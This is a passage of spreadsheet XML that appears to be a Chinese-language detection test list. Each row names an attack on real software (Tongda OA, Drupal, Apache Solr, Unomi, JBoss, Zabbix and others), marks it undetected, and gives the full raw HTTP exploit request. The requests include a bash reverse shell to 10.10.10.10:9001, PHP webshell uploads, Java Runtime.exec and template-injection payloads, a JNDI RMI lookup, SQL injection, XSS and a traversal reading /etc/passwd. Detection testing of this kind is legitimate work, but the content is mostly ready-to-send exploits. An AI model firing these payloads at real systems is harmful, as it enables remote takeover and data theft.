["org.apache.xbean.propertyeditor.JndiConverter", {"asText":"rmi://127.0.0.1:1099/ExploitMac"}]
------WebKitFormBoundaryexJikj3YU29aziBL--</t>
        </is>
      </c>
      <c r="D68" s="0">
        <f>_xlfn.ENCODEURL(C68)</f>
        <v/>
      </c>
    </row>
    <row r="69" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A69" s="2" t="inlineStr">
        <is>
          <t>SQL攻击：Sqlserver sql注入（假参数）</t>
        </is>
      </c>
      <c r="B69" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C69" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /alsdfjiasdlkamalskdf.html%3fasdflkaijfaldjflaskfoeialsdfkaj=/../sqlserver/search/search.asp?name=1%20or%201=1%20-- HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D69" s="0">
        <f>_xlfn.ENCODEURL(C69)</f>
        <v/>
      </c>
    </row>
    <row r="70" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A70" s="2" t="inlineStr">
        <is>
          <t>通达oa远程代码执行</t>
        </is>
      </c>
      <c r="B70" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C70" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /ispirit/interface/gateway.php?json=%7B%22url%22:%22general/attachment/shell.php.png%22%7D&amp;cmd=echo%20bash%20-i%20%3E&amp;%20/dev/tcp/10.10.10.10/9001%200%3E&amp;1; HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D70" s="0">
        <f>_xlfn.ENCODEURL(C70)</f>
        <v/>
      </c>
    </row>
    <row r="71" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A71" s="2" t="inlineStr">
        <is>
          <t>winmail邮件管理系统任意文件下载</t>
        </is>
      </c>
      <c r="B71" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C71" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /main.php?sessid=6ca89212aceb7b4b6997d3b1b4b9eaf0&amp;act=netdisk&amp;opt=download&amp;ftpfolder=Lw%3D%3D&amp;filename=cGhwaW5mby5waHA%3D&amp;retid=33938934 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Accept-Encoding: identity
Proxy-Connection: keep-alive
</t>
        </is>
      </c>
      <c r="D71" s="0">
        <f>_xlfn.ENCODEURL(C71)</f>
        <v/>
      </c>
    </row>
    <row r="72" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A72" s="2" t="inlineStr">
        <is>
          <t>Nginx 文件名逻辑漏洞利用</t>
        </is>
      </c>
      <c r="B72" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C72" s="0" t="inlineStr">
        <is>
          <t>POST / HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------201625008418654028163691115891
Content-Length: 253
Origin: http://192.168.248.133:8080
Connection: close
Referer: http://192.168.248.133:8080/
Cookie: PHPSESSIDCV=5Tte00Ga7WVlwh%2BZtuQR5A%3D%3D; javascript_enabled_detect=2; javascript_enabled=1694776959000; local_tz=Asia%2FShanghai; pma_lang=zh_CN
Upgrade-Insecure-Requests: 1
-----------------------------201625008418654028163691115891
Content-Disposition: form-data; name="file_upload"; filename="a.jpg "
Content-Type: image/jpeg
&lt;?php system($_GET['a']);?&gt;
-----------------------------201625008418654028163691115891--</t>
        </is>
      </c>
      <c r="D72" s="0">
        <f>_xlfn.ENCODEURL(C72)</f>
        <v/>
      </c>
    </row>
    <row r="73" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A73" s="2" t="inlineStr">
        <is>
          <t>PHP imap远程命令执行</t>
        </is>
      </c>
      <c r="B73" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C73" s="0" t="inlineStr">
        <is>
          <t>POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 113
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
hostname=x+-oProxyCommand%3decho%09ZWNobyAnSGVsbG8nPi90bXAvdGVzdA%3d%3d|base64%09-d|sh}&amp;username=222&amp;password=333</t>
        </is>
      </c>
      <c r="D73" s="0">
        <f>_xlfn.ENCODEURL(C73)</f>
        <v/>
      </c>
    </row>
    <row r="74" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A74" s="2" t="inlineStr">
        <is>
          <t>Zabbix Server trapper 命令注入</t>
        </is>
      </c>
      <c r="B74" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C74" s="0" t="inlineStr">
        <is>
          <t>POST /jsrpc.php?output=json-rpc HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 113
Accept-Encoding: identity
Content-Type: application/json-rpc
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
{"jsonrpc": "2.0", "method": "zabbix.status", "params": {}, "auth": "70d34a4c6232f61e12024645de74242e", "id": 26}</t>
        </is>
      </c>
      <c r="D74" s="0">
        <f>_xlfn.ENCODEURL(C74)</f>
        <v/>
      </c>
    </row>
    <row r="75" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A75" s="2" t="inlineStr">
        <is>
          <t>Apache Unomi远程代码执行_2</t>
        </is>
      </c>
      <c r="B75" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C75" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">POST /context.json HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 1052
Accept-Encoding: identity
{
  "personalizations":[
    {
      "id":"gender-test",
      "strategy":"matching-first",
      "strategyOptions":{
        "fallback":"var2"
      },
      "contents":[
        {
          "filters":[
            {
              "condition":{
                "parameterValues":{
                  "propertyName":"(#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length &lt; 2}[0]).(#execmethod.invoke(#rtobj,\" command\"))",
                  "comparisonOperator":"equals",
                  "propertyValue":"male"
                },
                "type":"profilePropertyCondition"
              }
            }
          ]
        }
      ]
    }
  ],
  "sessionId":"2333"
} </t>
        </is>
      </c>
      <c r="D75" s="0">
        <f>_xlfn.ENCODEURL(C75)</f>
        <v/>
      </c>
    </row>
    <row r="76" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A76" s="2" t="inlineStr">
        <is>
          <t>Supervisord 远程代码执行_1</t>
        </is>
      </c>
      <c r="B76" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C76" s="0" t="inlineStr">
        <is>
          <t>POST /RPC2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 213
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
&lt;?xml version="1.0"?&gt;
&lt;methodCall&gt;
&lt;methodName&gt;supervisor.supervisord.options.warnings.linecache.os.system&lt;/methodName&gt;
&lt;params&gt;
&lt;param&gt;
&lt;string&gt;touch /tmp/success&lt;/string&gt;
&lt;/param&gt;
&lt;/params&gt;
&lt;/methodCall&gt;</t>
        </is>
      </c>
      <c r="D76" s="0">
        <f>_xlfn.ENCODEURL(C76)</f>
        <v/>
      </c>
    </row>
    <row r="77" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A77" s="2" t="inlineStr">
        <is>
          <t>Ruby Net::FTP 模块命令注入</t>
        </is>
      </c>
      <c r="B77" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C77" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /download?uri=ftp://192.168.248.132:2121/&amp;file=|touch${IFS}success.txt HTTP/1.1
Host: 192.168.248.133:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSIDCV=5Tte00Ga7WVlwh%2BZtuQR5A%3D%3D; javascript_enabled_detect=2; javascript_enabled=1694776959000; local_tz=Asia%2FShanghai
Upgrade-Insecure-Requests: 1
</t>
        </is>
      </c>
      <c r="D77" s="0">
        <f>_xlfn.ENCODEURL(C77)</f>
        <v/>
      </c>
    </row>
    <row r="78" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A78" s="2" t="inlineStr">
        <is>
          <t>Redis Lua沙盒绕过命令执行</t>
        </is>
      </c>
      <c r="B78" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C78" s="0" t="inlineStr">
        <is>
          <t>*3
$4
eval
$185
local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res
$1
0</t>
        </is>
      </c>
      <c r="D78" s="0">
        <f>_xlfn.ENCODEURL(C78)</f>
        <v/>
      </c>
    </row>
    <row r="79" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A79" s="2" t="inlineStr">
        <is>
          <t>OpenTSDB远程代码执行</t>
        </is>
      </c>
      <c r="B79" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C79" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /q?start=2000/10/21-00:00:00&amp;m=sum:sys.cpu.nice&amp;o&amp;ylabel&amp;xrange=10:10&amp;yrange=[0:system(%27touch%20/tmp/success%27)]&amp;wxh=1516x644&amp;style=linespoint&amp;baba=lala&amp;grid=t&amp;json HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D79" s="0">
        <f>_xlfn.ENCODEURL(C79)</f>
        <v/>
      </c>
    </row>
    <row r="80" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A80" s="2" t="inlineStr">
        <is>
          <t>mongo-express 远程代码执行</t>
        </is>
      </c>
      <c r="B80" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C80" s="0" t="inlineStr">
        <is>
          <t>POST /checkValid HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 124
Accept-Encoding: identity
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")</t>
        </is>
      </c>
      <c r="D80" s="0">
        <f>_xlfn.ENCODEURL(C80)</f>
        <v/>
      </c>
    </row>
    <row r="81" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A81" s="2" t="inlineStr">
        <is>
          <t>SQL攻击：微软Access 布尔型盲注 - 堆叠查询注入</t>
        </is>
      </c>
      <c r="B81" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C81" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /vulnerabilities/sqli_blind/?id=1%29%3BIIF%282067%3D9387%2C1%2C1%2F0%29%16&amp;Submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D81" s="0">
        <f>_xlfn.ENCODEURL(C81)</f>
        <v/>
      </c>
    </row>
    <row r="82" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A82" s="2" t="inlineStr">
        <is>
          <t>跨站脚本(XSS)攻击：参数注入_1</t>
        </is>
      </c>
      <c r="B82" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C82" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /code_exc.php?a=%3CScRiPt+%3EkhrK(5297)%3C/ScRiPt%3E HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D82" s="0">
        <f>_xlfn.ENCODEURL(C82)</f>
        <v/>
      </c>
    </row>
    <row r="83" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A83" s="2" t="inlineStr">
        <is>
          <t>Ruby on Rails Sprockets任意文件读取(CVE-2018-3760)</t>
        </is>
      </c>
      <c r="B83" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C83" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /assets/file:%2F%2F/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D83" s="0">
        <f>_xlfn.ENCODEURL(C83)</f>
        <v/>
      </c>
    </row>
    <row r="84" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A84" s="2" t="inlineStr">
        <is>
          <t>万户OA文件上传漏洞利用</t>
        </is>
      </c>
      <c r="B84" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C84" s="0" t="inlineStr">
        <is>
          <t>POST /defaultroot/officeserverservlet HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 301
Accept-Encoding: identity
Content-Type: multipart/form-data
DBSTEP V3.0     185             0               611             DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
firstFilesize=dHJ1ZQ==
isDoc=dHJ1ZQ==
moduleType=aW5mb3JtYXRpb24=
FILETYPE=Ly4uLy4uL3B1YmxpYy9lZGl0L2FhYS5qc3A=
isViewOld=MQ==
&lt;% out.println("bea86d66a5278f9e6fa1112d2e2fcebf"); %&gt;</t>
        </is>
      </c>
      <c r="D84" s="0">
        <f>_xlfn.ENCODEURL(C84)</f>
        <v/>
      </c>
    </row>
    <row r="85" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A85" s="2" t="inlineStr">
        <is>
          <t>Sonatype Nexus Repository Manager命令执行</t>
        </is>
      </c>
      <c r="B85" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C85" s="0" t="inlineStr">
        <is>
          <t>POST /service/rest/beta/repositories/go/group HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Content-Length: 168
Accept-Encoding: identity
Content-Type: application/json
Nx-Anti-Csrf-Token: 0.2923785139192667
X-Forwarded-For: 127.0.0.1
X-Nexus-Ui: true
X-Requested-With: XMLHttpRequest
{ "name": "internal", "online": true, "storage": { "blobStoreName": "default", "strictContentTypeValidation": true }, "group": { "memberNames": ["$\\A{233*233*233}"] }}</t>
        </is>
      </c>
      <c r="D85" s="0">
        <f>_xlfn.ENCODEURL(C85)</f>
        <v/>
      </c>
    </row>
    <row r="86" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A86" s="2" t="inlineStr">
        <is>
          <t>NetMizer日志管理系统dirlist.php文件任意目录遍历</t>
        </is>
      </c>
      <c r="B86" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C86" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /data HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D86" s="0">
        <f>_xlfn.ENCODEURL(C86)</f>
        <v/>
      </c>
    </row>
    <row r="87" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A87" s="2" t="inlineStr">
        <is>
          <t>台湾 DEMSW 需量管理系統信息泄漏</t>
        </is>
      </c>
      <c r="B87" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C87" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /?a=Admin/Supervisor&amp;b=Search HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D87" s="0">
        <f>_xlfn.ENCODEURL(C87)</f>
        <v/>
      </c>
    </row>
    <row r="88" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A88" s="2" t="inlineStr">
        <is>
          <t>SQL攻击：Sqlserver sql注入（url预编码）</t>
        </is>
      </c>
      <c r="B88" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C88" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /%20HTTP/1.1%0d%0aAccept%3a%20$s/../../sqLServer/SeArcH/sEarch.AsP?name=ao'%20or%201=1%20-- HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D88" s="0">
        <f>_xlfn.ENCODEURL(C88)</f>
        <v/>
      </c>
    </row>
    <row r="89" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A89" s="2" t="inlineStr">
        <is>
          <t>Tenda AC9 命令注入（CVE-2022-36273）</t>
        </is>
      </c>
      <c r="B89" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C89" s="0" t="inlineStr">
        <is>
          <t>POST /goform/SetSysTimeCfg HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 79
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
timePeriod=86400&amp;ntpServer="time.windows.com| ls &gt; /tmp/f0und"&amp;timeZone=20%3A00</t>
        </is>
      </c>
      <c r="D89" s="0">
        <f>_xlfn.ENCODEURL(C89)</f>
        <v/>
      </c>
    </row>
    <row r="90" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A90" s="2" t="inlineStr">
        <is>
          <t>JBoss 4.x JBossMQ JMS 反序列化 (CVE-2017-7504)</t>
        </is>
      </c>
      <c r="B90" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C90" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /jbossmq-httpil/HTTPServerILServlet HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D90" s="0">
        <f>_xlfn.ENCODEURL(C90)</f>
        <v/>
      </c>
    </row>
    <row r="91" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A91" s="2" t="inlineStr">
        <is>
          <t>Drupal远程命令执行(CVE-2018-7600)</t>
        </is>
      </c>
      <c r="B91" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C91" s="0" t="inlineStr">
        <is>
          <t>POST /admin/config/development/configuration/single/import HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 538
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
config_type=system.simple&amp;config_name=123&amp;import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&amp;custom_entity_id=&amp;form_build_id=form-CUNhm97pHAW5vtQNyQT1Eb-U9gGwCnTfwjrwKWlcLgo&amp;form_token=Vhp4yne9jE35jvajiWI_9PNYcLh2vEe2N543L1s3u-c&amp;form_id=config_single_import_form&amp;op=%E5%AF%BC%E5%85%A5</t>
        </is>
      </c>
      <c r="D91" s="0">
        <f>_xlfn.ENCODEURL(C91)</f>
        <v/>
      </c>
    </row>
    <row r="92" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A92" s="2" t="inlineStr">
        <is>
          <t>Panabit Panalog 任意用户创建漏洞利用</t>
        </is>
      </c>
      <c r="B92" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C92" s="0" t="inlineStr">
        <is>
          <t>POST /singleuser_action.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 574
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Requested-With: XMLHttpRequest
{ "syncInfo": { "user": { "userId": "001", "userName": "001", "employeeId": "001", "departmentId": "001", "departmentName": "001", "coporationId": "001", "corporationName": "001", "userSex": "1",  "userDuty": "001", "userBirthday": "001", "userPost": "001", "userPostCode": "001", "userAlias": "001", "userRank": "001", "userPhone": "001", "userHomeAddress": "001", "userMobilePhone": "001", "userMailAddress": "001", "userMSN": "001", "userNt": "001", "userCA": "001", "userPwd": "001", "userClass": "001", "parentId": "001", "bxlx": "001" },"operationType": "ADD_USER" } }</t>
        </is>
      </c>
      <c r="D92" s="0">
        <f>_xlfn.ENCODEURL(C92)</f>
        <v/>
      </c>
    </row>
    <row r="93" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A93" s="2" t="inlineStr">
        <is>
          <t>Oxwall 远程代码执行</t>
        </is>
      </c>
      <c r="B93" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C93" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">POST /admin/settings/user HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 1091
Accept-Encoding: identity
Content-Type: multipart/form-data; boundary=127.0.1.1.0.3979.1407140346.314.1
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="form_name"
userSettingsForm
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="displayName"
realname
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="confirmEmail"
on
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="avatarSize"
90
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="bigAvatarSize"
190
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="avatar"
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="join_display_photo_upload"
display
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="save"
Save
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: file; name="bigAvatar"; filename="thricerbd.php5"
Content-Type: application/octet-stream
&lt;?php system('echo "&lt;?php echo \"&lt;pre&gt;\"; passthru(\$_GET[\'cmd\']); echo \"&lt;/pre&gt;\"; ?&gt;" &gt; liwo.php5'); ?&gt;
--127.0.1.1.0.3979.1407140346.314.1--
</t>
        </is>
      </c>
      <c r="D93" s="0">
        <f>_xlfn.ENCODEURL(C93)</f>
        <v/>
      </c>
    </row>
    <row r="94" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A94" s="2" t="inlineStr">
        <is>
          <t>Apache Unomi远程代码执行_1</t>
        </is>
      </c>
      <c r="B94" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C94" s="0" t="inlineStr">
        <is>
          <t>POST /context.json HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Content-Length: 476
Accept-Encoding: identity
{
    "filters": [
        {
            "id": "2333",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"command \");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "2333"
}</t>
        </is>
      </c>
      <c r="D94" s="0">
        <f>_xlfn.ENCODEURL(C94)</f>
        <v/>
      </c>
    </row>
    <row r="95" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A95" s="2" t="inlineStr">
        <is>
          <t>PHP-CGI远程任意代码执行_1</t>
        </is>
      </c>
      <c r="B95" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C95" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">POST /?-%64+allow_url_include%3d1+--define+safe_mode%3d0+-%64+suhosin.simulation%3dTRue+--define+disable_functions%3d%22%22+-d+open_basedir%3dnone+--define+auto_prepend_file%3dphp://input+--define+cgi.force_redirect%3doff+-d+cgi.redirect_status_env%3d0+-n HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 6
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
&lt;?php </t>
        </is>
      </c>
      <c r="D95" s="0">
        <f>_xlfn.ENCODEURL(C95)</f>
        <v/>
      </c>
    </row>
    <row r="96" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A96" s="2" t="inlineStr">
        <is>
          <t>Apache Solr Velocity 注入远程命令执行</t>
        </is>
      </c>
      <c r="B96" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C96" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /solr/test/select?q=1&amp;&amp;wt=velocity&amp;v.template=custom&amp;v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: identity
Pragma: no-cache
</t>
        </is>
      </c>
      <c r="D96" s="0">
